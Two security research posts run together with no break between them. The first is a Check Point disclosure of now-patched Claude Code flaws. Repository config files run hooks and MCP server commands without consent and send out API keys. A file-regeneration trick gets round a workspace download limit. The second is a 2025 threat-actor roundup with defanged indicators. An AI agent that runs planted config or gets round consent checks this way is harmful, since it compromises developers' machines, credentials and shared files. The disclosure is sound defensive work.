By Aviv Donenfeld and Oded Vanunu

Executive Summary

Check Point Research has discovered critical vulnerabilities in Anthropic’s Claude Code that allow attackers to achieve remote code execution and steal API credentials through malicious project configurations. The vulnerabilities exploit various configuration mechanisms including Hooks, Model Context Protocol (MCP) servers, and environment variables -executing arbitrary shell commands and exfiltrating Anthropic API keys when users clone and open untrusted repositories. Following our disclosure, Check Point Research collaborated closely with the Anthropic security team to ensure these vulnerabilities were fully remediated. All reported issues have been successfully patched prior to this publication.

Background

As AI-powered development tools rapidly integrate into software workflows, they introduce novel attack surfaces that traditional security models haven’t fully addressed. These platforms combine the convenience of automated code generation with the risks of executing AI-generated commands and sharing project configurations across collaborative environments.

Claude Code, Anthropic’s AI-powered command-line development tool, represents a significant target in this landscape. As a leading agentic tool within the developer ecosystem, its adoption by technology professionals and integration into enterprise workflows means that the platform’s security model directly impacts a substantial portion of the AI-assisted development landscape.

Claude Code Platform

Claude Code enables developers to delegate coding tasks directly from their terminal through natural language instructions. The platform supports comprehensive development operations including file modifications, Git repository management, automated testing, build system integration, Model Context Protocol (MCP) tool connections, and shell command execution.

Vibe-coding an awesome project using Claude Code

Configuration Files as Attack Surface

While analyzing Claude Code’s architecture, we examined how the platform manages its configurations. Claude Code supports project-level configurations through a .claude/settings.json file that lives directly in the repository. This design makes sense for team collaboration – when developers clone a project, they automatically inherit the same Claude Code settings their teammates use, ensuring consistent behavior across the team.

Since .claude/settings.json is just another file in the repository, any contributor with commit access can modify it. This creates a potential attack vector: malicious configurations could be injected into repositories, possibly triggering actions that users don’t expect and may not even be aware are occurring.

We set out to investigate what these repository-controlled configurations could actually do, and whether they could be leveraged to compromise developers working with affected codebases.

Vulnerability #1: RCE via Untrusted Project Hooks

During our research into Claude Code’s configuration documentation, we encountered Anthropic’s recently released Hooks feature. Hooks are designed to provide deterministic control over Claude Code’s behavior by executing user-defined commands at various points in the tool’s lifecycle. Unlike relying on the AI model to choose when to perform certain actions, Hooks ensure that specific operations always execute when predetermined conditions are met.

Some common use cases for Hooks include:

• Automatic code formatting: Run prettier on .ts files, gofmt on .go files, etc. after every file edit
• Compliance and debugging workflows: Provide automated feedback when Claude Code produces code that doesn’t follow codebase conventions
• Custom permissions: Block modifications to production files or sensitive directories

Hooks are defined in .claude/settings.json – the same repository-controlled configuration file we identified earlier. This means any contributor with commit access can define hooks that will execute shell commands on every collaborator’s machine when they work with the project. The question was: what happens when those commands come from an untrusted source?

To test this, we crafted a .claude/settings.json file which includes a simple hook that would open a Calculator. We chose to use the SessionStart event with a startup matcher, which according to Hooks documentation triggers automatically during Claude Code initialization:

     

When we ran claude in the project directory, the following trust dialog was presented:

The dialog warns about reading files and mentions that Claude Code may execute files “with your permission.” This phrasing suggests that user approval will be required before any execution occurs. Indeed, when Claude Code attempts to run commands during a normal session (such as executing a bash script), it does prompt for explicit confirmation:

Before execution of bash commands, Claude requests for explicit approval from the user.

We expected hooks to receive the same explicit confirmation prompt.

Back to our test: we clicked “Yes, proceed” on the prompt from when we first ran Claude.

Surprisingly, the Calculator app opened immediately, with no additional prompt or execution warning.

We went back and examined the initial dialog more carefully. While it mentions files being executed “with your permission,” there’s no warning that hook commands defined in .claude/settings.json will run automatically without confirmation, as well as no explicit approval which was required to execute the bash command demonstrated above. The session appears completely normal while commands from the untrusted repository have already run in the background.

With this behavior confirmed, the path to remote code execution became clear. An attacker could configure the hook to execute any shell command – such as downloading and running a malicious payload:

The following video demonstrates how an attacker may leverage this vulnerability to achieve a reverse shell:

 

During our investigation of Claude Code’s configuration system, we discovered that hooks weren’t the only feature controlled through repository settings. This led us to examine other configuration-based execution mechanisms, particularly the MCP (Model Context Protocol) integration.

Vulnerability #2: RCE Using MCP User Consent Bypass

Another interesting setting that Claude Code supports is MCP (Model Context Protocol), which allows Claude Code to interact with external tools and services through a standardized interface.

Similar to Hooks, MCP servers can be configured within the repository via .mcp.json configuration file. When opening a Claude Code conversation, the application initializes all MCP servers by running the commands written in the MCP configuration file.

To test the MCP configurations, we configured a fake MCP server whose initialization command opens a Calculator for demonstration:

We observed that Anthropic had implemented an improved dialog in response to our first reported vulnerability [GHSA-ph6w-f82w-28w6]. This new dialog explicitly mentions that commands in .mcp.json may be executed and emphasizes the risks of proceeding:

User consent dialogue for MCP servers initialization

This improved warning would make it much more difficult for an attacker to convince users to confirm initialization of Claude Code over a malicious project. With this in mind, our goal shifted to finding a way to execute the injected commands without any user consent.

Reviewing Claude Code’s settings documentation, we identified the following two configurations:

These parameters allow automatic approval of MCP servers: enableAllProjectMcpServers enables all servers defined in the project’s .mcp.json file, while enabledMcpjsonServers whitelists specific server names. In legitimate use cases, these settings enable seamless team collaboration – developers cloning a repository automatically get the same MCP integrations (filesystem, database, or GitHub tools) without manual setup.

Additionally, just like Claude Code hooks, these configurations can be included in the repository-controlled .claude/settings.json file. We tested whether this could bypass the user consent dialog:

Starting Claude Code with this configuration revealed a severe vulnerability: our command executed immediately upon running claude – before the user could even read the trust dialog. Ironically, the calculator application opened on top of the pending trust dialog:

Similar to the hooks vulnerability, we escalated this into a reverse shell, demonstrating complete compromise of a victim’s machine:

Vulnerability #3: API Key Exfiltration via Malicious ANTHROPIC_BASE_URL

Following our discovery that Claude Code’s configuration system could execute arbitrary commands, we wanted to understand the full scope of what could be controlled through .claude/settings.json. While exploring the configuration schema, we found that environment variables could also be defined in this file. One particular variable caught our attention: ANTHROPIC_BASE_URL.

This environment variable controls the endpoint for all Claude Code API communications. In normal operation, it points to Anthropic’s servers, but like other settings, it could be overridden in the project’s configuration file.

This presented an opportunity: we could intercept and analyze the actual communication between Claude Code and Anthropic’s servers. We set up mitmproxy, a tool for intercepting HTTP traffic, and configured ANTHROPIC_BASE_URL to route through our local proxy. This would let us observe every API call Claude Code made in real-time:

We started Claude Code and watched the traffic flow through our proxy. Something immediately caught our attention: before we could even interact with the trust dialog, Claude Code had already initiated several requests to Anthropic’s servers:

Requests captured by our mitmproxy

The requests seem to include prompts responsible for initializing the session with relevant information, including file names in the repository and recent commit messages.

But more critically, every request included the authorization header – our full Anthropic API key, completely exposed in plaintext:

What started as research method into the communication between Claude Code client and server immediately became an attack vector on its own. An attacker could place this configuration in a malicious repository:

When a victim clones the repository and runs claude, their API key would be sent directly to the attacker’s server – before the victim decides to trust the directory. No user interaction required.

But what could an attacker actually do with a stolen API key? The obvious answer was billing fraud – running Claude queries charged to the victim’s account. But as we explored Anthropic’s API documentation to understand the full scope of access, we discovered something far more concerning: Workspaces.

Claude’s Workspaces

Claude’s Workspaces is a feature introduced within the API Console to help developers manage multiple Claude deployments more effectively. Workspaces are especially useful for teams and multi-project environments, allowing them to organize resources, streamline access controls, and maintain shared contexts across tools. In practice, a Workspace acts as a collaborative environment where multiple API keys can work with the same cloud-mounted project files.

Files stored in a Workspace aren’t scoped to individual API keys. Instead, they belong to the workspace itself – meaning multiple developers, each using their own API key, may implicitly share the same storage area. Any API key belonging to that workspace inherits visibility into the Workspace’s stored files.

To understand how this behaves in practice, we created a workspace with two API keys:

We then reviewed the Files API documentation, which allows managing files within a Workspace, and began testing file uploads and downloads.

We uploaded a file using the following request:

We noticed the API response showed the downloadable parameter set to false:

Attempting to download the file did indeed fail. We confirmed this behavior in the documentation:

You can only download files that were created by skills or the code execution tool. Files that you uploaded cannot be downloaded.

This appears to be an architectural choice rather than a security boundary. Any developer who can upload files to the Workspace is already fully trusted: if they can write files, they typically also have access to the original content.

Nevertheless, since this weakens our attack impact, we wondered whether we could bypass this behavior. Since files generated by Claude’s code execution tool are marked as downloadable, we explored whether the attacker could simply ask Claude to regenerate an existing file using the stolen API key. If successful, this would convert a non-downloadable file into a workspace artifact that is eligible for download.

We instructed Claude to produce a copy of the file with a .unlocked suffix:

As we expected, Claude generated an exact copy of the file:

We then downloaded this regenerated file and confirmed the content was identical to the original:

This demonstrates that the download restriction can be trivially bypassed: regenerating the file through the code execution tool converts it into a system-generated artifact that the Files API allows to be downloaded.

This confirms an attacker using a stolen API key gains complete read and write access to all workspace files, include those uploaded by other developers.

With a stolen API key, an attacker can:

• Access sensitive files by regenerating them through the code execution tool
• Delete critical files from the workspace
• Upload arbitrary files to poison the workspace or exhaust the 100 GB storage space quota
• Exhaust API credits, leading to unexpected costs for the account owner or service interruption when rate limits/budgets are reached

Unlike the code execution vulnerabilities that compromised a single developer’s machine, a stolen API key may provide access to an entire team’s shared resources.

The following video demonstrates the complete attack chain: exfiltrating the victim’s API key and using it to access their workspace storage:

Supply Chain Attack Scenarios

This vulnerabilities are particularly dangerous because they leverage supply chain attack vectors – the malicious configuration spreads through trusted development channels:

• Malicious pull requests: Attackers can submit seemingly legitimate PRs that include the malicious configuration alongside actual code changes, making it harder for reviewers to spot the threat
• Honeypot repositories: Attackers can create useful-looking projects (development tools, code examples, tutorials) that contain the malicious configuration, targeting developers who discover and clone these repositories
• Internal enterprise repositories: A single compromised developer account or insider threat can inject the configuration into company codebases, affecting entire development teams

The key factor making this a supply chain attack is that developers inherently trust project configuration files – they’re viewed as metadata rather than executable code, so they rarely undergo the same security scrutiny as application code during code reviews.

Anthropic’s Fixes

Anthropic addressed the first vulnerability by implementing an enhanced warning dialog that appears when users open projects containing untrusted Claude Code configurations:

This improved warning addresses not only the hooks vulnerability but also other potential risks from untrusted project directories, including malicious MCP configurations. Anthropic claimed to develop additional security hardening features planned for release in the coming months to provide more granular risk controls.

For the second vulnerability, Anthropic fixed the bypass by ensuring that MCP servers cannot execute before user approval, even when enableAllProjectMcpServers or enabledMcpjsonServers are set in the repository’s configuration files.

For the third vulnerability, Anthropic fixed the API key exfiltration issue by ensuring that no API requests are initiated before users confirm the trust dialog. This prevents malicious ANTHROPIC_BASE_URL configurations from intercepting API keys during the project initialization phase, as Claude Code now defers all network operations until after explicit user consent.

We would like to thank Anthropic for their excellent collaboration and thoughtful engagement throughout this disclosure process.

Protecting Against Configuration-Based Attacks

Modern development tools increasingly rely on project-embedded configurations and automations, creating new attack vectors that developers must navigate. As these tools continue to evolve and add features, configuration-based risks are likely here to stay as a persistent threat in development ecosystems.

Just as developers have learned they cannot blindly execute code from untrusted sources, we must extend that same caution to opening projects with modern development tools. The line between configuration and execution continues to blur, requiring us to treat project setup files with the same careful attention we apply to executable code.

How to Stay Protected:

• Keep Your Tools Updated – Ensure you are running the latest version of Claude Code. All vulnerabilities discussed in this report have been patched, and running the current version is the most effective way to stay protected.
• Inspect configuration directories before opening projects – examine .claude/, .vscode/, and similar tool-specific folders
• Pay attention to tool warnings about potentially unsafe files, even in legitimate-looking repositories
• Review configuration changes during code reviews with the same rigor applied to source code
• Question unusual setup requirements that seem overly complex for a project’s apparent scope

Timeline and Disclosure

• July 21st, 2025 – Check Point Research reported the malicious hooks vulnerability to Anthropic
• August 26th, 2025 – Anthropic implemented a final fix after collaborative refinement process
• August 29th, 2025 – Anthropic publishes GitHub Security Advisory GHSA-ph6w-f82w-28w6
• September 3rd, 2025 – Check Point Research reported the user consent bypass vulnerability to Anthropic
• September 22nd, 2025 – Anthropic implemented a fix for the bypass vulnerability
• October 3rd, 2025 – Anthropic publishes CVE-2025-59536
• October 28th, 2025 – Check Point Research reported the API Key exfiltration vulnerability to Anthropic
• December 28th, 2025 – Anthropic implemented a fix for the API Key exfiltration vulnerability
• January 21st, 2026 – Anthropic publishes CVE-2026-21852
• February 25th, 2026 – Public disclosure

Conclusion

These vulnerabilities in Claude Code highlight a critical challenge in modern development tools: balancing powerful automation features with security. The ability to execute arbitrary commands through repository-controlled configuration files created severe supply chain risks, where a single malicious commit could compromise any developer working with the affected repository.

The integration of AI into development workflows brings tremendous productivity benefits, but also introduces new attack surfaces that weren’t present in traditional tools. Configuration files that were once passive data now control active execution paths. As AI-powered development tools become more prevalent, the security community must carefully evaluate these new trust boundaries to protect the integrity of our software supply chains.

The post Caught in the Hook: RCE and API Token Exfiltration Through Claude Code Project Files | CVE-2025-59536 | CVE-2026-21852<other cve="" id="" tbd=""></other> appeared first on Check Point Research.

Introduction

Check Point Research (CPR) continuously tracks threats, following the clues that lead to major players and incidents in the threat landscape. Whether it’s high-end financially-motivated campaigns or state-sponsored activity, our focus is to figure out what the threat is, report our findings to the relevant parties, and make sure Check Point customers stay protected.

Some of our work naturally makes it into the spotlight through public reports and deep blog posts. However, a large portion of what we uncover remains in the shadows but is used on a day-to-day basis to improve protections, connect the dots between incidents, and keep a watchful eye on known threat actors and infrastructure.

In 2025, the activity varied by region and objective. In the Americas, attackers invested in high-value targets, including early ToolShell exploitation assessed as Chinese-nexus activity against North American government organizations. Identity-centric intrusion methods were also prominent, such as AiTM-enabled credential theft in targeted campaigns against researchers within US think tanks.

In Europe, the year combined disruption, espionage, influence operations, and financially motivated intrusions. Russian-affiliated activity drove pressure in Eastern Europe and Ukraine, while Chinese and Iranian-nexus actors remained active, and election-related influence efforts persisted, including renewed targeting around Moldova’s parliamentary cycle.

Across Asia Pacific and Central Asia, Chinese-nexus espionage was sustained, frequently relying on updated versions of established attack playbooks. In the Middle East and Africa, campaigns reflected a diversified mix of state-aligned operations, destructive activity, and PSOA-linked exploitation, with conflict periods amplifying targeted collection such as attempts to compromise internet-connected cameras.

Across these threats, novelty more often came from how familiar techniques were combined than from entirely new tooling. Actors repeatedly used trusted platforms and common enterprise pathways: cloud hosting for command and control, remote administration tooling, DLL side-loading chains, and social engineering patterns such as ClickFix, to reduce detection and improve reliability. Overall, 2025 reinforced the need for durable visibility across identity, cloud, and endpoints, faster closure of exposed and unpatched entry points, and industry collaboration.

Figure 1 – Overview of CPR Untold Stories 2025.

Americas

Throughout the year, the Americas were a focal point for both nation state activity and high-end cybercrime, with a wide mix of actors targeting government and private-sector organizations alike. The state-sponsored groups in particular seem to reserve some of their most innovative tradecraft for targets in the Americas. Whether through zero-day exploitation, abuse of cloud services, or highly refined phishing operations, attackers appear willing to invest more time and sophisticated efforts for targets in this region.

ToolShell Exploitation Used as a Zero-day by Chinese-nexus Actors

ToolShell is an exploit chain targeting on-premises Microsoft SharePoint and enables unauthenticated remote code execution (RCE) on vulnerable servers. It works by abusing weaknesses in how SharePoint handles certain web service / API requests, which allow attackers to reach code execution without needing valid credentials. ToolShell’s involvement in active exploitation efforts has been observed globally.

While analyzing in July the broader wave of ToolShell activity, we found a subset of targeted incidents where the exploit chain appears to have been used as a zero-day, before the original patch was available. In each of these limited early exploitation attempts, the targets were government-sector organizations in North America.

We attribute the zero-day exploitation activity to Chinese-nexus threat actors. This assessment is based on the supporting infrastructure we observed in this campaign, which includes router-based relay nodes consistent with Operation Relay Box (ORB)-style networks, an approach most frequently seen in intrusions attributed by multiple vendors to Chinese nexus groups. This assessment aligns with Microsoft Threat Intelligence report that Chinese APTs exploited the vulnerability as a zero-day.

Figure 2 – ToolShell Exploitation Timeline.

Kimsuky Targeting Think-Tanks in the US

Since mid-July, we’ve been tracking a targeted phishing campaign aimed at researchers within US think tanks which focus on North Korean affairs and policy. The campaign relies on spear-phishing emails, often impersonating peers from European universities or NGOs, with invitations to collaborate or participate in academic or policy events.

The malicious emails contain either a link or a PDF attachment embedding a QR code, both of which lead to web pages impersonating legitimate organizations.

Figure 4 – Example of a phishing landing page (hosted at signup-forms[.]theonlycompany[.]com), explaining the login request.

The landing pages claim a login is required and include a button that redirects victims to credential-harvesting sites tailored to their email providers, such as Yahoo, Gmail, or Microsoft. The phishing infrastructure leverages Adversary-in-the-Middle (AiTM) kits to bypass MFA and gain unauthorized access to victims’ email accounts.

RedCurl Weaponizes LNK files

RedCurl is a sophisticated, Russian-speaking threat actor historically tied to corporate espionage, and most recently, to ransomware operations. The actor has targeted North American entities for years. In more recent activity affecting North America and Asia, we observed a new multi-stage infection chain that pulls a remote resource by abusing the Working Directory parameter in LNK files. The LNKs point to a legitimate Windows binary (such as conhost or rundll32), and pass an argument that references a file located in that remote working directory production[.]dav[.]indeedex[.]workers[.]dev.

Creation date: 1970-01-01T00:00:00Z 
Access date: 1970-01-01T00:00:00Z 
Modification date: 1970-01-01T00:00:00Z 
Target path: My Computer (Computer) : C:\Windows\system32\rundll32.exe 
Icon location: %ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe 
Target working directory: \\production.dav.indeedex.workers[.]dev\DavWWWRoot 
Command line arguments: C:\Windows\system32\shell32.dll,Control_RunDLL .\6b5c-47a8-919e-39f3c44d7a3e.dll 
LNK Flags: HasTargetIDList, IsUnicode, HasWorkingDir, HasArguments, HasExpIcon, HasIconLocation

This combination of living-off-the-land execution, using WebDAV and remote resource loading, appears to contribute to exceptionally low detection rates. While we haven’t observed clear post-exploitation activity in our data, we did see indications suggesting the intrusion path may ultimately lead to the deployment of RedCurl’s custom ransomware.

Europe

The activity we observed in Europe ranges from operations designed to disrupt, to those intended to influence and mislead, to financially motivated campaigns. Together, these threats threaten every pillar of data security: confidentiality, integrity, and availability.

The most aggressive activity is driven by Russian-affiliated actors, especially in Eastern Europe and Ukraine, where they employ a mixture of tactics consistent with aims of espionage, disruption, and “hacktivism.” At the beginning of 2025, we reported on one major espionage campaign, attributed to APT29, which targeted foreign affairs ministries. However, Russia nexus actors isn’t the only major player in this arena: Europe continues to face sustained pressure from Chinese and Iranian nexus threat actors as well, alongside a steady stream of financially-motivated groups targeting the continent.

Camaro Dragon Targeting Government Sector

In 2025, we tracked multiple Chinese-aligned actors targeting Europe. Within this broader set of operations, we observed a recurring campaign against European government agencies that looks like an evolution of the SmugX activity we reported in 2023. The campaign, likely a subset of Camaro Dragon (also known as Mustang Panda), uses well-crafted phishing to deliver PlugX payloads.

The initial infection begins with spear-phishing emails sent from what appear to be government addresses, either compromised mailboxes or spoofed senders, targeting Foreign Affairs ministries across Europe. The messages contain a hyperlink to an HTML landing page hosted on Microsoft Azure’s cloud-based web storage service (*.web.core.windows.net).

Figure 5 – Camero Dragon’s Infection Chain.

When opened, the HTML executes a short, embedded JavaScript snippet that reconstructs and launches a download link. The script dynamically assembles the next stage URL using ASCII-encoded fragments, then redirects the browser to download an archive file such as 262a1003a2cd04993b29e687686eba573d6202fea8611c437ecbd6312802677a. This archive contains a Windows shortcut (LNK) file that serves as the dropper for the next stage.

COLDRIVER in Southeast Europe

Despite multiple recent public exposures, the Russian affiliated threat group COLDRIVER (also tracked as UNC4057, Star Blizzard, and Callisto) has not slowed down or paused its activity. Instead, the group continues to rapidly adapt its operations. In Q4 2025, we observed multiple campaigns impersonating US-based nonprofit organizations, including NED (National Endowment for Democracy) and USRF (The US–Russia Foundation), as well as campaigns targeting Southeast Europe that use fake websites impersonating a major regional media and broadcasting company.

These campaigns highlight the group’s ability to quickly evolve its tooling and delivery mechanisms in response to exposure. As part of this evolution, COLDRIVER introduced changes to its multi-stage MAYBEROBOT (also known as SIMPLEFIX) malware delivery chain. Beginning with ClickFix-style self-infection, the updated chain incorporates additional stagers with enhanced attacker-side security measures, such as DGA and RSA-based authenticity checks for C2 communications.

Figure 6 – ClickFix-style attack staged using a fake United Media website.

Lying Pigeon Campaign Targeting the Moldovan Elections

In 2024, we exposed Operation MiddleFloor, a campaign in Moldova by the Russian-speaking group Lying Pigeon. Ahead of the October 2024 presidential elections and EU referendum, the group used spoofed emails and forged documents, impersonating EU institutions, Moldovan ministries, and political figures to spread anti-European narratives. We also discovered that previously, Lying Pigeon also targeted other major European political events, including the NATO 2023 summit in Vilnius and Spain’s 2023 general elections.

Since mid-April 2025, we observed a new wave of activity aimed at Moldova’s September parliamentary elections. Most of this activity used the same techniques as the MiddleFloor campaign, spreading fake documents to erode trust in Moldovan pro-European leadership. In addition, at the end of May, Lying Pigeon launched a large-scale defamation campaign using over a dozen domains to promote a poster contest attacking PAS, the ruling Party of Action and Solidarity founded by President Maia Sandu. Though framed as citizen-led, it was a coordinated propaganda and disinformation effort running on Lying Pigeon infrastructure. Interestingly, the contest site itself was cloned from a website of a Russian anti-terrorism poster competition held in 2024.

Figure 7 – Anti-PAS contest website (machine translation).

UAC-0050 Phishing Campaign

In August, a phishing campaign targeting multiple organizations in Ukraine was launched from compromised email accounts. The emails masquerade as communications from the Ukrainian tax authorities and contain a malicious link to the 4sync.com file sharing service, prompting recipients to download a malicious archive named tax_gov_ua_zapit_15_08_2025_X.zip. Upon successful execution, a Remote IT support tool is installed on background, granting unauthorized access to the threat actor. This campaign shares similarities with UAC-0050.

Figure 8 – UAC-0050 Phishing masquerading as tax.gov.ua.

Zipline Shifting to Europe

Earlier this year, we reported a sophisticated phishing campaign targeting US organizations with unusually elaborate social engineering. The campaign, named ZipLine, was noteworthy because the attacker reached out through the victim’s public “Contact Us” form, reversing the typical phishing flow and prompting the organization to initiate the email exchange.

Since that publication, we’ve seen a noticeable shift in both the group’s TTPs and its targeting, with a clear refocus on Europe. Recent waves lean heavily on HR-themed lures, and our data suggests the actor is running country-by-country campaigns, most notably against the UK, Poland, Italy, and the Czech Republic. The tooling also appears to have evolved into newer iterations of MixShell, with the actor now relying almost entirely on herokuapp domains for C2 communication.

Figure 9 – Zipline lure targets Europe.

Asia Pacific and Central Asia

The activity we observed across Asia reflects a sustained regional espionage push by Chinese-aligned actors. For much of the year, the dominant TTPs (Tactics, Techniques, and Procedures) we saw were best described as updated versions of familiar playbooks: reusing modular backdoor ecosystems such as PlugX and ShadowPad, and repeating patterns that were effective for these groups in the past.

At the same time, a smaller subset of APT activity stood out for being more deliberate and mature, reflecting a higher investment in tradecraft and operational discipline than the broader baseline we typically see in the region. However, the picture on the ground is still unclear as many of the same environments are targeted by multiple actors over long periods, leaving behind overlapping infrastructure, tooling, and artifacts. This creates an intertwined landscape that can be difficult to untangle, especially in Southeast Asia.

GoldenSMTP Targeting Governments in Central Asia

Throughout 2025, we observed multiple instances of activity that we determined to be an evolution of the IndigoZebra APT. These events primarily target Central Asia and rely on a mix of backdoors and supporting tools. Initial access is typically delivered via password-protected ZIP archives using phishing-style filenames, followed by DLL hijacking to install the first backdoor. Across the intrusion chain, we also saw a broader toolkit that included Pandora RC installer (open-source IT remote control software), shellcode loaders, and the NPPSPY credential stealer.

Figure 10 – GoldenSMTP masquerades as SentinelOne Agent using debug strings.

Next, the attackers deploy a dedicated SMTP/IMAP-based implant, named GoldenSMTP, which communicates through attacker-controlled email accounts, often named after local athletes, inside the target organization. This unusual C2 channel, combined with the use of compromised systems, appears to be at least partly responsible for the notably low detection rates of the backdoors installed in the later stages of the intrusion.

Several of the samples showed code overlaps with older IndigoZebra malware, and the operation itself reflects familiar patterns: targeting Central Asia, reusing older infrastructure, relatively simple obfuscation, and checks for Russian-language systems.

Flax Typhoon Targets IT Supply Chains in Taiwan

We observed an intrusion set at a Taiwan-based cloud service provider where the threat actor abused legitimate security products to execute a DLL side-loading chain. The side-loaded DLL acted as a PlugX loader, which then brought in multiple plugins and injected them into other processes, with capabilities such as reverse shell access and keylogging. In this case, the built-in nslookup.exe utility was used to initiate C2 communication.

After establishing a foothold, the attackers scanned the network and moved laterally using RDP. We also identified a SoftEther VPN binary placed at C:\Windows\SysWOW64\conhost.exe, a technique that other security vendors linked to the APT group known as Flax Typhoon.

Flax Typhoon has been flagged by US government agencies as a major cyber risk for the technology ecosystem, including managed service providers (MSPs) and other IT service providers.

SilverFox Attacks Web Servers

The SilverFox APT group continues to target organizations across East Asia, with a particular focus on Taiwan and Japan, using a multi-stage backdoor known publicly as ValleyRAT. As part of the infection chain, the group employs a “bring your own vulnerable driver” (BYOVD) technique to terminate security product processes and reduce the chances of detection.

We also identified a newly observed initial access vector: compromised PHP servers exposed to remote code execution. After successful exploitation, the group leverages the legitimate Windows msiexec component to install a ValleyRAT implant from hxxp[:]//aadcasc[.]cn-nb1[.]rains3[.]com/100ww.msi.

Figure 11 – ValleyRAT web exploitation chain.

YoroTrooper Targets Eurasian Economic Union Countries

Throughout 2025, YoroTrooper, a threat group active in CIS countries since at least 2020, was observed targeting member states of the Eurasian Economic Union (EAEU) countries and its regulatory body, the Eurasian Economic Commission. Targets included government and diplomatic entities, as well as infrastructure projects in these countries. The attackers used PDF documents to lure victims to either phishing pages that steal credentials or to cloud-based file sharing services hosting malware. Consistent with other YoroTrooper campaigns, the threat actors deployed “burner” RATs as payloads, typically leveraging services such as Telegram and Discord for C2 communications.

Figure 12- Example of phishing PDF document (549df969dc5b340b4fc850584a01c767ca8a1bd712f16210f164f85e26c3e58b) targeting government entity in Kyrgyz Republic.

APT36 Targeting Indian Aerospace Industry

At the beginning of 2025, we identified a targeted phishing campaign aimed at government entities and the Indian aerospace industry. Based on infrastructure overlap, targeting focus, and operational tradecraft, we can attribute the activity with moderate confidence to APT36.

Phishing emails, with the subject line “RFI for Surveillance Systems for [REDACTED] State Police,” were sent from a compromised legitimate local Indian government email account, lending significant credibility to the lure. The campaign leveraged ISO attachments containing malicious LNK files, which executed embedded batch scripts. These scripts deployed a stealer malware capable of exfiltrating documents and other sensitive files from compromised hosts, and shares code similarity with ObliqueRAT. Later in the year, we observed additional activity consistent with this campaign targeting entities in Afghanistan, indicating an expansion of the threat group’s operational scope.

Figure 13 – Snippet of PDF lure targeting the Indian aerospace industry.

Middle East and Africa

Recent activity across the Middle Eastern and North African (MENA) region reflects a diversified threat landscape with state-aligned advanced persistent threat (APT) groups, private sector offensive actors (PSOAs), and destructive operators deploying wipers. Campaigns blend legacy social engineering with increasingly disciplined operational planning, and use legitimate cloud apps, and code-signing or supply chain-style trust signals to lower detection rates.

Private Sector Offensive Actors

Some of the more distinctive activity we’ve been tracking is commonly associated with what are known as Private Sector Offensive Actors (PSOA). Many of the PSOA-linked clusters we observed this year were active in the Middle East, where this type of innovative capability continues to surface. One of our prominent findings was the discovery of a zero-day exploited by StealthFalcon: CVE-2025-33053, a vulnerability used to target high-profile organizations in Turkey, Qatar, Egypt, Ethiopia and Yemen.

StealthFalcon, however, is not unique. Throughout 2025, we identified additional activity clusters that stood out in terms of their behavior and tradecraft. We came across one of them while tracking high-profile sample submitters in the Middle East. The activity consisted of a cluster of suspicious TIFF (an image file format for storing raster graphic images) files that contained embedded ELF payloads aimed at Android devices.

Our analysis indicated the files were exploiting a vulnerability, later disclosed as CVE-2025-21042, in the way Samsung parses TIFF/DNG files. Based on the tradecraft, infrastructure overlaps, and recurring keywords like “Bridge Head,” we assess the operator to be a private sector offensive actor. Additional research into the same activity, called LANDFALL, reached similar conclusions. We saw indications the campaign affected targets in Iraq, Iran, Turkey, Bahrain, Morocco and Pakistan.

Iranian Activity

Israeli-Iranian War: Targeting Cameras

During the twelve-day Israeli–Iranian war in June, threat actors largely stuck to their familiar playbooks, primarily using spear phishing campaigns to deploy wipers and backdoors. One standout trend we observed was a sharp increase in attempts to compromise specific Israeli cameras by exploiting CVE-2023-6895 and CVE-2017-7921 via infrastructure we associate with Iranian actors.

In several major conflicts in recent years, compromising internet-connected cameras proved to be an effective way to support bombing damage assessment (BDA) by providing near–real-time visibility into strike impacts. This wave targeting Israeli cameras appears to fit that pattern and aligns with prior public disclosures by Israeli officials that Iran-nexus actors seek access to private CCTV feeds to assess the accuracy of their missile strikes and refine subsequent targeting efforts.

Figure 14 – Spike in cameras targeting in Israel.

MuddyWater Password Spray in Israeli Municipality

In late June, a successful password spray activity originating from a Nord VPN infrastructure affected a municipal government in Israel. One month later, we observed a successful login attempt from the same attacker infrastructure to an email account which then sent spear phishing emails to recipients in Israel.

The phishing email contained an embedded link, hxxps[:]//pharmacynod[.]com/join/join.html, used as a decoy invitation to join a Teams conversation. The landing page is a ClickFix page that tricks the user into pasting a PowerShell script into the Run dialog and executing it. This script is a RAT which initially collects information about the infected machine and can execute arbitrary PowerShell commands received from the command and control server. This script’s obfuscation method aligns with previous PowerShell backdoors associated with MuddyWater.

Figure 15 – MuddyWater ClickFix Teams lure.

Nimbus Manticore Activity in Africa

We recently uncovered a long-running campaign that we attribute to Nimbus Manticore, an IRGC-affiliated actor active across the region and parts of Europe. What we observed highlights this actor’s evolution: while continuing to lean on familiar phishing themes, the actor has also begun deploying more sophisticated malware, making himself something of an outlier compared to much of the broader Iranian threat landscape.

As we continue to track this operation, we’ve observed renewed activity targeting Northeast Africa, impersonating T-Mobile with a fake hiring website careerst-mobile[.]com and using similar tradecraft which suggests the campaign remains active and adaptable.

Figure 16 – Renewed Nimbus Manticore phishing activity targeting Africa with impersonated T-Mobile site.

Iran-Nexus Wipers

Throughout the year, multiple Iran-aligned actors targeted Israel with disruptive campaigns involving wipers and ransomware. These operations, often at least partly opportunistic, are designed to interfere with the day-to-day functioning of Israeli organizations. Among the most prominent groups behind this activity are Void Manticore (Handala Hack) and Cotton Sandstorm, carrying out attacks using ‘WhiteLock’ ransomware, deployed after WezRat infostealer.

Figure 17 – ‘WhiteLock’ ransomware chat server.

One such campaign, likely conducted by Handala, involved a phishing email sent to hundreds of organizations across Israel. The messages were delivered from a compromised account belonging to an Israeli CRM solution provider. Recipients were instructed to “back up” their files by downloading a malicious .msi installer (6eb7dbf27a25639c7f11c05fd88ea2a301e0ca93d3c3bdee1eb5917fc60a56ff) hosted on Mega file share. When executed, the installer deployed a wiper that iterates over user file folders and overwrites files with spaces. In parallel, a malicious PowerShell script changed the user’s desktop wallpaper to display a political message tied to the Israeli-Hamas war.

WIRTE: Espionage and Sabotage

At the end of 2024, we published research connecting a wave of destructive activity in Israel, known as ‘Cyber Toufan Al-Aqsa’, to WIRTE, a Hamas-associated threat actor. In 2025, the group continued its destructive operations with new variants of SameCoin wiper, while also running parallel campaigns aimed at Arabic-speaking political entities across the Middle East, with a particular focus on Jordan and Egypt.

